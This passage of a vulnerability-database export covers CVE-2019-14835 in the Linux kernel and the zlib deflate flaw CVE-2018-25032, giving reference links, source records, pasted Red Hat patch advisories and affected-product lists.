"url": "http://lists.opensuse.org/opensuse-security-announce/2019-09/msg00066.html"
},
{
"trust": 1.0,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-14835"
},
{
"trust": 0.5,
"url": "https://www.redhat.com/mailman/listinfo/rhsa-announce"
},
{
"trust": 0.5,
"url": "https://access.redhat.com/security/vulnerabilities/kernel-vhost"
},
{
"trust": 0.5,
"url": "https://access.redhat.com/security/cve/cve-2019-14835"
},
{
"trust": 0.5,
"url": "https://bugzilla.redhat.com/):"
},
{
"trust": 0.5,
"url": "https://access.redhat.com/security/team/key/"
},
{
"trust": 0.5,
"url": "https://access.redhat.com/security/team/contact/"
},
{
"trust": 0.5,
"url": "https://access.redhat.com/security/updates/classification/#important"
},
{
"trust": 0.4,
"url": "https://access.redhat.com/articles/11258"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-15030"
},
{
"trust": 0.2,
"url": "https://usn.ubuntu.com/4135-1"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-15031"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-14821"
},
{
"trust": 0.2,
"url": "https://lists.ubuntu.com/mailman/listinfo/ubuntu-security-announce"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2016-10905"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-14816"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-20976"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-14814"
},
{
"trust": 0.1,
"url": "https://launchpad.net/ubuntu/+source/linux-hwe/5.0.0-29.31~18.04.1"
},
{
"trust": 0.1,
"url": "https://launchpad.net/ubuntu/+source/linux-raspi2/4.4.0-1122.131"
},
{
"trust": 0.1,
"url": "https://launchpad.net/ubuntu/+source/linux-kvm/5.0.0-1017.18"
},
{
"trust": 0.1,
"url": "https://launchpad.net/ubuntu/+source/linux-azure/4.15.0-1059.64"
},
{
"trust": 0.1,
"url": "https://launchpad.net/ubuntu/+source/linux-gcp/4.15.0-1044.46"
},
{
"trust": 0.1,
"url": "https://launchpad.net/ubuntu/+source/linux-gcp/5.0.0-1017.17"
},
{
"trust": 0.1,
"url": "https://launchpad.net/ubuntu/+source/linux-raspi2/5.0.0-1017.17"
},
{
"trust": 0.1,
"url": "https://launchpad.net/ubuntu/+source/linux/5.0.0-29.31"
},
{
"trust": 0.1,
"url": "https://launchpad.net/ubuntu/+source/linux-aws/4.4.0-1094.105"
},
{
"trust": 0.1,
"url": "https://launchpad.net/ubuntu/+source/linux-aws-hwe/4.15.0-1050.52~16.04.1"
},
{
"trust": 0.1,
"url": "https://launchpad.net/ubuntu/+source/linux-gke-4.15/4.15.0-1044.46"
},
{
"trust": 0.1,
"url": "https://launchpad.net/ubuntu/+source/linux-raspi2/4.15.0-1047.51"
},
{
"trust": 0.1,
"url": "https://launchpad.net/ubuntu/+source/linux-aws/4.15.0-1050.52"
},
{
"trust": 0.1,
"url": "https://launchpad.net/ubuntu/+source/linux/4.15.0-64.73"
},
{
"trust": 0.1,
"url": "https://launchpad.net/ubuntu/+source/linux-oracle/4.15.0-1025.28~16.04.1"
},
{
"trust": 0.1,
"url": "https://launchpad.net/ubuntu/+source/linux-azure/5.0.0-1020.21~18.04.1"
},
{
"trust": 0.1,
"url": "https://launchpad.net/ubuntu/+source/linux-snapdragon/5.0.0-1021.22"
},
{
"trust": 0.1,
"url": "https://launchpad.net/ubuntu/+source/linux-aws/5.0.0-1016.18"
},
{
"trust": 0.1,
"url": "https://launchpad.net/ubuntu/+source/linux-kvm/4.4.0-1058.65"
},
{
"trust": 0.1,
"url": "https://launchpad.net/ubuntu/+source/linux-snapdragon/4.4.0-1126.132"
},
{
"trust": 0.1,
"url": "https://launchpad.net/ubuntu/+source/linux-oem/4.15.0-1056.65"
},
{
"trust": 0.1,
"url": "https://launchpad.net/ubuntu/+source/linux-kvm/4.15.0-1046.46"
},
{
"trust": 0.1,
"url": "https://launchpad.net/ubuntu/+source/linux-gke-5.0/5.0.0-1017.17~18.04.1"
},
{
"trust": 0.1,
"url": "https://launchpad.net/ubuntu/+source/linux-oracle/4.15.0-1025.28"
},
{
"trust": 0.1,
"url": "https://launchpad.net/ubuntu/+source/linux-gcp/4.15.0-1044.70"
},
{
"trust": 0.1,
"url": "https://launchpad.net/ubuntu/+source/linux/4.4.0-164.192"
},
{
"trust": 0.1,
"url": "https://launchpad.net/ubuntu/+source/linux-snapdragon/4.15.0-1064.71"
},
{
"trust": 0.1,
"url": "https://launchpad.net/ubuntu/+source/linux-azure/5.0.0-1020.21"
},
{
"trust": 0.1,
"url": "https://launchpad.net/ubuntu/+source/linux-hwe/4.15.0-64.73~16.04.1"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-14815"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-20856"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-11478"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-2181"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-10207"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-11477"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-3846"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-12614"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-21008"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-10126"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-14284"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-14283"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-11833"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-2054"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-0136"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-20961"
},
{
"trust": 0.1,
"url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2019-14835"
},
{
"trust": 0.1,
"url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2019-2215"
},
{
"trust": 0.1,
"url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2019-17054"
},
{
"trust": 0.1,
"url": "http://slackware.com"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-16746"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-17055"
},
{
"trust": 0.1,
"url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2019-17075"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-15118"
},
{
"trust": 0.1,
"url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2019-17053"
},
{
"trust": 0.1,
"url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2016-10906"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2016-10906"
},
{
"trust": 0.1,
"url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2018-20976"
},
{
"trust": 0.1,
"url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2019-17052"
},
{
"trust": 0.1,
"url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2019-15117"
},
{
"trust": 0.1,
"url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2019-17133"
},
{
"trust": 0.1,
"url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2019-14816"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-15505"
},
{
"trust": 0.1,
"url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2019-15098"
},
{
"trust": 0.1,
"url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2019-16746"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-17054"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-2215"
},
{
"trust": 0.1,
"url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2019-15118"
},
{
"trust": 0.1,
"url": "http://slackware.com/gpg-key"
},
{
"trust": 0.1,
"url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2016-10905"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-17056"
},
{
"trust": 0.1,
"url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2019-3900"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-15117"
},
{
"trust": 0.1,
"url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2019-17056"
},
{
"trust": 0.1,
"url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2019-14821"
},
{
"trust": 0.1,
"url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2019-10638"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-15098"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-17075"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-17053"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-3900"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-10638"
},
{
"trust": 0.1,
"url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2019-17055"
},
{
"trust": 0.1,
"url": "http://osuosl.org)"
},
{
"trust": 0.1,
"url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2019-14814"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-17133"
},
{
"trust": 0.1,
"url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2019-15505"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-17052"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/articles/2974891"
},
{
"trust": 0.1,
"url": "https://usn.ubuntu.com/4135-2"
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-146821"
},
{
"db": "PACKETSTORM",
"id": "154514"
},
{
"db": "PACKETSTORM",
"id": "154602"
},
{
"db": "PACKETSTORM",
"id": "154951"
},
{
"db": "PACKETSTORM",
"id": "154565"
},
{
"db": "PACKETSTORM",
"id": "155212"
},
{
"db": "PACKETSTORM",
"id": "154538"
},
{
"db": "PACKETSTORM",
"id": "154659"
},
{
"db": "PACKETSTORM",
"id": "154513"
},
{
"db": "PACKETSTORM",
"id": "154572"
},
{
"db": "PACKETSTORM",
"id": "154540"
},
{
"db": "NVD",
"id": "CVE-2019-14835"
}
]
},
"sources": {
"_id": null,
"data": [
{
"db": "VULHUB",
"id": "VHN-146821",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "154514",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "154602",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "154951",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "154565",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "155212",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "154538",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "154659",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "154513",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "154572",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "154540",
"ident": null
},
{
"db": "NVD",
"id": "CVE-2019-14835",
"ident": null
}
]
},
"sources_release_date": {
"_id": null,
"data": [
{
"date": "2019-09-17T00:00:00",
"db": "VULHUB",
"id": "VHN-146821",
"ident": null
},
{
"date": "2019-09-18T21:22:40",
"db": "PACKETSTORM",
"id": "154514",
"ident": null
},
{
"date": "2019-09-25T17:55:27",
"db": "PACKETSTORM",
"id": "154602",
"ident": null
},
{
"date": "2019-10-23T18:32:10",
"db": "PACKETSTORM",
"id": "154951",
"ident": null
},
{
"date": "2019-09-23T18:26:18",
"db": "PACKETSTORM",
"id": "154565",
"ident": null
},
{
"date": "2019-11-08T15:37:19",
"db": "PACKETSTORM",
"id": "155212",
"ident": null
},
{
"date": "2019-09-20T14:57:38",
"db": "PACKETSTORM",
"id": "154538",
"ident": null
},
{
"date": "2019-09-30T04:44:44",
"db": "PACKETSTORM",
"id": "154659",
"ident": null
},
{
"date": "2019-09-18T21:22:34",
"db": "PACKETSTORM",
"id": "154513",
"ident": null
},
{
"date": "2019-09-23T18:31:46",
"db": "PACKETSTORM",
"id": "154572",
"ident": null
},
{
"date": "2019-09-20T14:57:53",
"db": "PACKETSTORM",
"id": "154540",
"ident": null
},
{
"date": "2019-09-17T16:15:10.980000",
"db": "NVD",
"id": "CVE-2019-14835",
"ident": null
}
]
},
"sources_update_date": {
"_id": null,
"data": [
{
"date": "2023-02-12T00:00:00",
"db": "VULHUB",
"id": "VHN-146821",
"ident": null
},
{
"date": "2024-11-21T04:27:27.790000",
"db": "NVD",
"id": "CVE-2019-14835",
"ident": null
}
]
},
"threat_type": {
"_id": null,
"data": "local",
"sources": [
{
"db": "PACKETSTORM",
"id": "154514"
},
{
"db": "PACKETSTORM",
"id": "154951"
},
{
"db": "PACKETSTORM",
"id": "154513"
}
],
"trust": 0.3
},
"title": {
"_id": null,
"data": "Ubuntu Security Notice USN-4135-1",
"sources": [
{
"db": "PACKETSTORM",
"id": "154514"
}
],
"trust": 0.1
},
"type": {
"_id": null,
"data": "overflow",
"sources": [
{
"db": "PACKETSTORM",
"id": "154602"
},
{
"db": "PACKETSTORM",
"id": "154565"
},
{
"db": "PACKETSTORM",
"id": "154538"
},
{
"db": "PACKETSTORM",
"id": "154659"
},
{
"db": "PACKETSTORM",
"id": "154540"
}
],
"trust": 0.5
}
}
VAR-202203-1690
Vulnerability from variot - Updated: 2026-03-09 20:35
zlib before 1.2.12 allows memory corruption when deflating (i.e., when compressing) if the input has many distant matches. Description:
Red Hat Advanced Cluster Management for Kubernetes 2.3.11 images
Red Hat Advanced Cluster Management for Kubernetes provides the capabilities to address common challenges that administrators and site reliability engineers face as they work across a range of public and private cloud environments. Clusters and applications are all visible and managed from a single console—with security policy built in. Bugs fixed (https://bugzilla.redhat.com/):
2057544 - Cancel rpm-ostree transaction after failed rebase 2058674 - whereabouts IPAM CNI ip-reconciler cronjob specification requires hostnetwork, api-int lb usage & proper backoff 2062655 - [4.8.z backport] cluster scaling new nodes ovs-configuration fails on all new nodes 2070762 - [4.8z] WebScale: duplicate ecmp next hop error caused by multiple of the same gateway IPs in ovnkube cache 2074053 - Internal registries with a big number of images delay pod creation due to recursive SELinux file context relabeling 2074680 - csv_succeeded metric not present in olm-operator for all successful CSVs 2076211 - CVE-2022-1677 openshift/router: route hijacking attack via crafted HAProxy configuration file 2077004 - Bump to latest available 1.21.11 k8s 2077370 - [4.8.z] NetworkPolicy tests are failing on metal IPv6 2077765 - (release-4.8) Gather namespace names with overlapping UID ranges 2078477 - Latest ose-jenkins-agent-base:v4.9.0 image fails to start on OpenShift due to FIPS error 2084259 - [4.8] OCP ignores STOPSIGNAL in Dockerfile and sends SIGTERM 2088196 - Redfish set boot device failed for node in OCP 4.8 latest RC
- -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA256
===================================================================== Red Hat Security Advisory
Synopsis: Important: zlib security update Advisory ID: RHSA-2023:0943-01 Product: Red Hat Enterprise Linux Advisory URL: https://access.redhat.com/errata/RHSA-2023:0943 Issue date: 2023-02-28 CVE Names: CVE-2018-25032 =====================================================================
- Summary:
An update for zlib is now available for Red Hat Enterprise Linux 7.7 Advanced Update Support, Red Hat Enterprise Linux 7.7 Telco Extended Update Support, and Red Hat Enterprise Linux 7.7 Update Services for SAP Solutions.
Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.
- Relevant releases/architectures:
Red Hat Enterprise Linux Server AUS (v. 7.7) - x86_64 Red Hat Enterprise Linux Server E4S (v. 7.7) - ppc64le, x86_64 Red Hat Enterprise Linux Server Optional AUS (v. 7.7) - x86_64 Red Hat Enterprise Linux Server Optional E4S (v. 7.7) - ppc64le, x86_64 Red Hat Enterprise Linux Server Optional TUS (v. 7.7) - x86_64 Red Hat Enterprise Linux Server TUS (v. 7.7) - x86_64
- Description:
The zlib packages provide a general-purpose lossless data compression library that is used by many different programs.
Security Fix(es):
- zlib: A flaw found in zlib when compressing (not decompressing) certain inputs (CVE-2018-25032)
For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.
- Solution:
For details on how to apply this update, which includes the changes described in this advisory, refer to:
https://access.redhat.com/articles/11258
- Bugs fixed (https://bugzilla.redhat.com/):
2067945 - CVE-2018-25032 zlib: A flaw found in zlib when compressing (not decompressing) certain inputs
- Package List:
Red Hat Enterprise Linux Server AUS (v. 7.7):
Source: zlib-1.2.7-18.el7_7.1.src.rpm
x86_64: zlib-1.2.7-18.el7_7.1.i686.rpm zlib-1.2.7-18.el7_7.1.x86_64.rpm zlib-debuginfo-1.2.7-18.el7_7.1.i686.rpm zlib-debuginfo-1.2.7-18.el7_7.1.x86_64.rpm zlib-devel-1.2.7-18.el7_7.1.i686.rpm zlib-devel-1.2.7-18.el7_7.1.x86_64.rpm
Red Hat Enterprise Linux Server E4S (v. 7.7):
Source: zlib-1.2.7-18.el7_7.1.src.rpm
ppc64le: zlib-1.2.7-18.el7_7.1.ppc64le.rpm zlib-debuginfo-1.2.7-18.el7_7.1.ppc64le.rpm zlib-devel-1.2.7-18.el7_7.1.ppc64le.rpm
x86_64: zlib-1.2.7-18.el7_7.1.i686.rpm zlib-1.2.7-18.el7_7.1.x86_64.rpm zlib-debuginfo-1.2.7-18.el7_7.1.i686.rpm zlib-debuginfo-1.2.7-18.el7_7.1.x86_64.rpm zlib-devel-1.2.7-18.el7_7.1.i686.rpm zlib-devel-1.2.7-18.el7_7.1.x86_64.rpm
Red Hat Enterprise Linux Server TUS (v. 7.7):
Source: zlib-1.2.7-18.el7_7.1.src.rpm
x86_64: zlib-1.2.7-18.el7_7.1.i686.rpm zlib-1.2.7-18.el7_7.1.x86_64.rpm zlib-debuginfo-1.2.7-18.el7_7.1.i686.rpm zlib-debuginfo-1.2.7-18.el7_7.1.x86_64.rpm zlib-devel-1.2.7-18.el7_7.1.i686.rpm zlib-devel-1.2.7-18.el7_7.1.x86_64.rpm
Red Hat Enterprise Linux Server Optional AUS (v. 7.7):
x86_64: minizip-1.2.7-18.el7_7.1.i686.rpm minizip-1.2.7-18.el7_7.1.x86_64.rpm minizip-devel-1.2.7-18.el7_7.1.i686.rpm minizip-devel-1.2.7-18.el7_7.1.x86_64.rpm zlib-debuginfo-1.2.7-18.el7_7.1.i686.rpm zlib-debuginfo-1.2.7-18.el7_7.1.x86_64.rpm zlib-static-1.2.7-18.el7_7.1.i686.rpm zlib-static-1.2.7-18.el7_7.1.x86_64.rpm
Red Hat Enterprise Linux Server Optional E4S (v. 7.7):
ppc64le: minizip-1.2.7-18.el7_7.1.ppc64le.rpm minizip-devel-1.2.7-18.el7_7.1.ppc64le.rpm zlib-debuginfo-1.2.7-18.el7_7.1.ppc64le.rpm zlib-static-1.2.7-18.el7_7.1.ppc64le.rpm
x86_64: minizip-1.2.7-18.el7_7.1.i686.rpm minizip-1.2.7-18.el7_7.1.x86_64.rpm minizip-devel-1.2.7-18.el7_7.1.i686.rpm minizip-devel-1.2.7-18.el7_7.1.x86_64.rpm zlib-debuginfo-1.2.7-18.el7_7.1.i686.rpm zlib-debuginfo-1.2.7-18.el7_7.1.x86_64.rpm zlib-static-1.2.7-18.el7_7.1.i686.rpm zlib-static-1.2.7-18.el7_7.1.x86_64.rpm
Red Hat Enterprise Linux Server Optional TUS (v. 7.7):
x86_64: minizip-1.2.7-18.el7_7.1.i686.rpm minizip-1.2.7-18.el7_7.1.x86_64.rpm minizip-devel-1.2.7-18.el7_7.1.i686.rpm minizip-devel-1.2.7-18.el7_7.1.x86_64.rpm zlib-debuginfo-1.2.7-18.el7_7.1.i686.rpm zlib-debuginfo-1.2.7-18.el7_7.1.x86_64.rpm zlib-static-1.2.7-18.el7_7.1.i686.rpm zlib-static-1.2.7-18.el7_7.1.x86_64.rpm
These packages are GPG signed by Red Hat for security. Our key and details on how to verify the signature are available from https://access.redhat.com/security/team/key/
- References:
https://access.redhat.com/security/cve/CVE-2018-25032 https://access.redhat.com/security/updates/classification/#important
- Contact:
The Red Hat security contact is secalert@redhat.com. More contact details at https://access.redhat.com/security/team/contact/
Copyright 2023 Red Hat, Inc. -----BEGIN PGP SIGNATURE----- Version: GnuPG v1
iQIVAwUBY/3zpNzjgjWX9erEAQgopRAAnicJE4nJGD63kGm+PqFucbREdCZ3tCHM ppSjAZYm6e3z2cXqCA8Y/ZQxQjLGFUuT3PtzsD8eehFIu7WL6hO7s+jVaor/PYxG h1X9YRrtAGlCrMwUXgSpTmqCeXMofoXhZRgj/0fJASp/+C6sMOBYyJkPsSCT00fu bIU/TEKTFa6UNjLGBZLNMD1htyYAI70mrLp+zJB4HlFP8G7bX8XMduBwyFu8l9Ye C4u9A4n1yUWo6eJpK1jn91y9W0VcB2JEnCQ3CySVI4Oa0hzSQBEfVnGDicELtAcv F6yV4AcCk30JtsXLtihnZszk5Ke0uH/VICY9ubPH52rBqLzCELWrAtEkcfGJnPFr /TrCfgDC9vIDE9+QPWamraX62NKy9vwOf/pPOnSOGJUYngYuVIJl/ipWwbr0BhLd J3Ckbo0jlXjjXmMKnfv0LDr/0dvLNGc4VjqbEcJULNMiUu3Lh/I0/v3H7NCr8674 RFDBaKXJlzgJGCcQ7JFr/63Aw6kOp9lVJgjbnDYs1AV/FQVkLsIvw5hIdONZI5cP uJcrO4lfjw/4827E7gdBTnQEBRuZB/wGtmtcFrvIPiK+qWl0t457ic+nvDl8noiM kBZezS7yByEjCqudJgxEYrB8uUt+gX9aj08sqeyM9jSzUCpJAVCNycufQGvmblNA vP1CheTiOdc= =wNUm -----END PGP SIGNATURE----- -- RHSA-announce mailing list RHSA-announce@redhat.com https://listman.redhat.com/mailman/listinfo/rhsa-announce . 8) - noarch
Additional Changes:
For detailed information on changes in this release, see the Red Hat Enterprise Linux 8.7 Release Notes linked from the References section. Bugs fixed (https://bugzilla.redhat.com/):
2053429 - CVE-2022-23806 golang: crypto/elliptic IsOnCurve returns true for invalid field elements 2053532 - CVE-2022-23772 golang: math/big: uncontrolled memory consumption due to an unhandled overflow via Rat.SetString 2053541 - CVE-2022-23773 golang: cmd/go: misinterpretation of branch names can lead to incorrect access control
- JIRA issues fixed (https://issues.jboss.org/):
SRVKE-1217 - New KafkaSource implementation does not default to PLAIN for SASL
- Description:
Red Hat OpenShift Container Platform is Red Hat's cloud computing Kubernetes application platform solution designed for on-premise or private cloud deployments.
This advisory contains the container images for Red Hat OpenShift Container Platform 4.7.51. See the following advisory for the RPM packages for this release:
https://access.redhat.com/errata/RHBA-2022:2267
Space precludes documenting all of the container images in this advisory.
You may download the oc tool and use it to inspect release image metadata as follows:
(For x86_64 architecture)
$ oc adm release info quay.io/openshift-release-dev/ocp-release:4.7.51-x86_64
The image digest is sha256:539c1f5982343e0709179f305e347560304fdeb89a09bd042a59a58a836a0940
(For s390x architecture)
$ oc adm release info quay.io/openshift-release-dev/ocp-release:4.7.51-s390x
The image digest is sha256:f6fa9f75e6de166b6daccbc6830bbeaade38eac97faa2752e0c38af23aa4135e
(For ppc64le architecture)
$ oc adm release info quay.io/openshift-release-dev/ocp-release:4.7.51-ppc64le
The image digest is sha256:e4a1eb51749bdb0fa429e5b7f697d3b38cd32b76786dc1ce579a5d53827705b0
All OpenShift Container Platform 4.7 users are advised to upgrade to these updated packages and images when they are available in the appropriate release channel. To check for available updates, use the OpenShift Console or the CLI oc command. Instructions for upgrading a cluster are available at https://docs.openshift.com/container-platform/4.7/updating/updating-cluster-cli.html
- Solution:
For OpenShift Container Platform 4.7 see the following documentation, which will be updated shortly for this release, for important instructions on how to upgrade your cluster and fully apply this asynchronous errata update:
https://docs.openshift.com/container-platform/4.7/release_notes/ocp-4-7-release-notes.html
Details on how to access this content are available at https://docs.openshift.com/container-platform/4.7/updating/updating-cluster-cli.html
- Bugs fixed (https://bugzilla.redhat.com/):
2057526 - cloud provider config change breaks the cluster 2076211 - CVE-2022-1677 openshift/router: route hijacking attack via crafted HAProxy configuration file 2081483 - csv_succeeded metric not present in olm-operator for all successful CSVs 2082029 - Bump to latest available 1.20.15 k8s
- Summary:
The Migration Toolkit for Containers (MTC) 1.7.2 is now available. Description:
The Migration Toolkit for Containers (MTC) enables you to migrate Kubernetes resources, persistent volume data, and internal container images between OpenShift Container Platform clusters, using the MTC web console or the Kubernetes API. Bugs fixed (https://bugzilla.redhat.com/):
2007557 - CVE-2021-3807 nodejs-ansi-regex: Regular expression denial of service (ReDoS) matching ANSI escape codes 2038898 - [UI] 'Update Repository' option not getting disabled after adding the Replication Repository details to the MTC web console 2040693 - 'Replication repository' wizard has no validation for name length 2040695 - [MTC UI] 'Add Cluster' wizard gets stuck when the cluster name length is more than 63 characters 2044591 - CVE-2022-0235 node-fetch: exposure of sensitive information to an unauthorized actor 2048537 - Exposed route host to image registry: connecting successfully to invalid registry 'xyz.com' 2053259 - CVE-2022-0536 follow-redirects: Exposure of Sensitive Information via Authorization Header leak 2055658 - [MTC UI] Cancel button on 'Migrations' page does not disappear when migration gets Failed/Succeeded with warnings 2056962 - [MTC UI] UI shows the wrong migration type info after changing the target namespace 2058172 - [MTC UI] Successful Rollback is not showing the green success icon in the 'Last State' field. 2058529 - [MTC UI] Migrations Plan is missing the type for the state migration performed before upgrade 2061335 - [MTC UI] 'Update cluster'
button is not getting disabled 2062266 - MTC UI does not display logs properly [OADP-BL] 2062862 - [MTC UI] Clusters page behaving unexpectedly on deleting the remote cluster's service account secret from backend 2074675 - HPAs of DeploymentConfigs are not being updated when migrating from Openshift 3.x to Openshift 4.x 2076593 - Velero pod log missing from UI drop down 2076599 - Velero pod log missing from downloaded logs folder [OADP-BL] 2078459 - [MTC UI] Storageclass conversion plan is adding migstorage reference in migplan 2079252 - [MTC] Rsync options logs not visible in log-reader pod 2082221 - Don't allow Storage class conversion migration if source cluster has only one storage class defined [UI] 2082225 - non-numeric user when launching stage pods [OADP-BL] 2088022 - Default CPU requests on Velero/Restic are too demanding making scheduling fail in certain environments 2088026 - Cloud propagation phase in migration controller is not doing anything due to missing labels on Velero pods 2089126 - [MTC] Migration controller cannot find Velero Pod because of wrong labels 2089411 - [MTC] Log reader pod is missing velero and restic pod logs [OADP-BL] 2089859 - [Crane] DPA CR is missing the required flag - Migration is getting failed at the EnsureCloudSecretPropagated phase due to the missing secret VolumeMounts 2090317 - [MTC] mig-operator failed to create a DPA CR due to null values being passed instead of int [OADP-BL] 2096939 - Fix legacy operator.yml inconsistencies and errors 2100486 - [MTC UI] Target storage class field is not getting respected when clusters don't have replication repo configured
{
"affected_products": {
"_id": null,
"data": [
{
"_id": null,
"model": "h500s",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "mariadb",
"scope": "lt",
"trust": 1.0,
"vendor": "mariadb",
"version": "10.8.4"
},
{
"_id": null,
"model": "scalance sc626-2c",
"scope": "lt",
"trust": 1.0,
"vendor": "siemens",
"version": "3.0"
},
{
"_id": null,
"model": "macos",
"scope": "gte",
"trust": 1.0,
"vendor": "apple",
"version": "11.0"
},
{
"_id": null,
"model": "linux",
"scope": "eq",
"trust": 1.0,
"vendor": "debian",
"version": "10.0"
},
{
"_id": null,
"model": "e-series santricity os controller",
"scope": "gte",
"trust": 1.0,
"vendor": "netapp",
"version": "11.0.0"
},
{
"_id": null,
"model": "mariadb",
"scope": "lt",
"trust": 1.0,
"vendor": "mariadb",
"version": "10.6.9"
},
{
"_id": null,
"model": "mariadb",
"scope": "gte",
"trust": 1.0,
"vendor": "mariadb",
"version": "10.6.0"
},
{
"_id": null,
"model": "h410s",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "zlib",
"scope": "gte",
"trust": 1.0,
"vendor": "zlib",
"version": "1.2.2.2"
},
{
"_id": null,
"model": "mariadb",
"scope": "lt",
"trust": 1.0,
"vendor": "mariadb",
"version": "10.7.5"
},
{
"_id": null,
"model": "hci compute node",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "fedora",
"scope": "eq",
"trust": 1.0,
"vendor": "fedoraproject",
"version": "35"
},
{
"_id": null,
"model": "mac os x",
"scope": "gte",
"trust": 1.0,
"vendor": "apple",
"version": "10.15"
},
{
"_id": null,
"model": "management services for element software",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "zulu",
"scope": "eq",
"trust": 1.0,
"vendor": "azul",
"version": "6.45"
},
{
"_id": null,
"model": "python",
"scope": "lt",
"trust": 1.0,
"vendor": "python",
"version": "3.10.5"
},
{
"_id": null,
"model": "linux",
"scope": "eq",
"trust": 1.0,
"vendor": "debian",
"version": "11.0"
},
{
